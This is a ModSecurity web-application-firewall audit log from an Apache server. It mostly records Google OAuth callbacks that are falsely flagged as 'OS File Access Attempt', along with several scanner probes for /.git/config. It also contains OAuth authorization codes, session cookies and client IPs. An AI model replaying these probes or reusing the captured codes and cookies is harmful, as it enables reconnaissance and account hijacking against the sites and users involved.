/administration/index.php?code=4/0AVMBsJhwPVAkpp1WMIYqvFI-GLU5hVBGcD6ccoCJVTvHm2WIOop0vBR81AdqiAEWumATNw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=dtdbiohdir7u5ph7k220puaes5 --722d2526-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --722d2526-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHmIEdutIOpb_kg22i7awAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343520413119 448790 (- - -) Stopwatch2: 1753343520413119 448790; combined=5545, p1=584, p2=4635, p3=127, p4=67, p5=131, sr=192, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --722d2526-Z-- --f68c333d-A-- [24/Jul/2025:10:56:20.367762 +0300] aIHnI1ooLYw4or2LgWJhpAAAAMY 212.28.242.186 36966 127.0.0.1 7081 --f68c333d-B-- GET /administration/index.php?code=4/0AVMBsJhMLRiJNlpU4l5CTOW502x6pu2a_iZH-HlCj58Fd92QmoWa7EMAc8GoCjTeBmQLMg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=fsbjkcrdqs72s4n04dj1cd71k6 --f68c333d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --f68c333d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHnI1ooLYw4or2LgWJhpAAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753343779942244 425722 (- - -) Stopwatch2: 1753343779942244 425722; combined=5599, p1=728, p2=4560, p3=126, p4=57, p5=127, sr=185, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f68c333d-Z-- --2cbd5113-A-- [24/Jul/2025:10:56:38.589714 +0300] aIHnNlooLYw4or2LgWJh4AAAANE 93.123.109.64 37668 127.0.0.1 7081 --2cbd5113-B-- GET /.git/config HTTP/1.0 Host: own-dev.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --2cbd5113-F-- HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Content-Encoding: gzip link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --2cbd5113-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/.git/config"] [unique_id "aIHnNlooLYw4or2LgWJh4AAAANE"] Stopwatch: 1753343798555280 34590 (- - -) Stopwatch2: 1753343798555280 34590; combined=3926, p1=620, p2=2989, p3=60, p4=65, p5=191, sr=184, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2cbd5113-Z-- --807f9376-A-- [24/Jul/2025:10:56:50.405956 +0300] aIHnQlooLYw4or2LgWJiDAAAAMY 93.123.109.64 36592 127.0.0.1 7081 --807f9376-B-- GET /.git/config HTTP/1.0 Host: www.own-dev.com X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Accept-Charset: utf-8 Accept-Encoding: gzip --807f9376-F-- HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Content-Encoding: gzip link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --807f9376-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.own-dev.com"] [uri "/.git/config"] [unique_id "aIHnQlooLYw4or2LgWJiDAAAAMY"] Stopwatch: 1753343810378685 27352 (- - -) Stopwatch2: 1753343810378685 27352; combined=2767, p1=695, p2=1875, p3=68, p4=50, p5=78, sr=250, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --807f9376-Z-- --b2ab0b4f-A-- [24/Jul/2025:11:00:52.234228 +0300] aIHoM1ooLYw4or2LgWJoVAAAAMc 212.28.242.186 36282 127.0.0.1 7081 --b2ab0b4f-B-- GET /administration/index.php?code=4/0AVMBsJhAkVeIe6IHHxHjcxhDuj_Lqn6vatPDnCItizWF-XW7VYKBhI_EAQGl6N8_weXpVQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=1&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=kq8i3t0g7cble4ic109de4fam6 --b2ab0b4f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --b2ab0b4f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHoM1ooLYw4or2LgWJoVAAAAMc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344051791518 442971 (- - -) Stopwatch2: 1753344051791518 442971; combined=5322, p1=742, p2=4254, p3=116, p4=53, p5=157, sr=184, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b2ab0b4f-Z-- --9f395a12-A-- [24/Jul/2025:11:01:16.017662 +0300] aIHoSxukk8cgt8UnU9pZMwAAAEQ 212.28.242.186 33698 127.0.0.1 7081 --9f395a12-B-- GET /administration/index.php?code=4/0AVMBsJjImMTzK0V1ESXThdq4kKqATZsUt0jAoeg-kdeY6FSEcxjvb0Z23sgNjqSegmRpDA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=adlmh4qj4rh72h5jj3shrlr9g3 --9f395a12-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --9f395a12-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHoSxukk8cgt8UnU9pZMwAAAEQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344075574660 443187 (- - -) Stopwatch2: 1753344075574660 443187; combined=5888, p1=781, p2=4777, p3=126, p4=66, p5=137, sr=203, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9f395a12-Z-- --e574c514-A-- [24/Jul/2025:11:01:51.693405 +0300] aIHob1ooLYw4or2LgWJqmAAAAMs 212.28.242.186 37678 127.0.0.1 7081 --e574c514-B-- GET /administration/index.php?code=4/0AVMBsJjko1Fn__StcQbNBRrKh6NxkF1TGpUMn0T4Z1aAyhZi6aB7uepdnhj1s-J1D4MOug&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br accept-language: en-US,en;q=0.9 cookie: PHPSESSID=uie6130al60eee21u4dkfub6n7 --e574c514-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --e574c514-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHob1ooLYw4or2LgWJqmAAAAMs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344111248013 445709 (- - -) Stopwatch2: 1753344111248013 445709; combined=5297, p1=705, p2=4230, p3=128, p4=107, p5=126, sr=255, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e574c514-Z-- --78ae7041-A-- [24/Jul/2025:11:10:54.610623 +0300] aIHqjkdutIOpb_kg22jCBwAAABA 3.14.254.96 36184 127.0.0.1 7081 --78ae7041-B-- GET /.git/config HTTP/1.0 Host: raqmix.cloud X-Real-IP: 3.14.254.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Accept-Charset: utf-8 Accept-Encoding: gzip --78ae7041-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --78ae7041-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raqmix.cloud"] [uri "/.git/config"] [unique_id "aIHqjkdutIOpb_kg22jCBwAAABA"] Stopwatch: 1753344654602315 8613 (- - -) Stopwatch2: 1753344654602315 8613; combined=5521, p1=1605, p2=3834, p3=0, p4=0, p5=82, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --78ae7041-Z-- --de15a82b-A-- [24/Jul/2025:11:11:48.709212 +0300] aIHqxFooLYw4or2LgWJ5wQAAAME 212.28.242.186 35876 127.0.0.1 7081 --de15a82b-B-- GET /administration/index.php?code=4/0AVMBsJhWMpHO2W4ljjiN2DboGXETlK61Xr_h9Dm1D7NW8_6mky9ykvS6bLCXx30oXTa2pA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=aod5ac3mu1e9ht1pnt024u1nr5 --de15a82b-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --de15a82b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHqxFooLYw4or2LgWJ5wQAAAME"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344708269398 440228 (- - -) Stopwatch2: 1753344708269398 440228; combined=4619, p1=556, p2=3560, p3=160, p4=72, p5=270, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de15a82b-Z-- --d09f581c-A-- [24/Jul/2025:11:12:10.942353 +0300] aIHq2looLYw4or2LgWJ6eAAAANc 212.28.242.186 41810 127.0.0.1 7081 --d09f581c-B-- GET /administration/index.php?code=4/0AVMBsJgihnETdK5Q69SOKAEHEseXyrxiBZdJE-Do1wOZcJatOf11InzzVSZOZxY0QXV0KQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: 